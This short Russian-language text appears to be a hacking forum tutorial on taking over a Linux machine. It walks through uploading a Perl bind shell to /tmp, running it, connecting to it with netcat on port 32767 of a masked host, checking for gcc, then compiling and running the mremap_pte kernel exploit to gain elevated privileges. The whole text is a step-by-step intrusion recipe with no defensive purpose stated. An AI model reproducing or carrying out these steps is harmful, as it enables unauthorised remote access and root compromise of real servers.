Будем брать експлоитом mremap_pte.
Для этого нам надо пробиндить тачку, что бы получить шелл обалочку. Ищем открытую папку для заливки файла.
По дефолту это папка tmp. Залеваем bind.pl и запускаем командой perl bind.pl. Открываем net cat и вбиваем
www.xxxxxxx.xxx 32767. Появился back conect. Проверяем на наличии компилятора командой which gcc.
Залеваем наш експлоит в tmp. Компилим gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte.
Запускаем ./mremap_pte и проверяем права.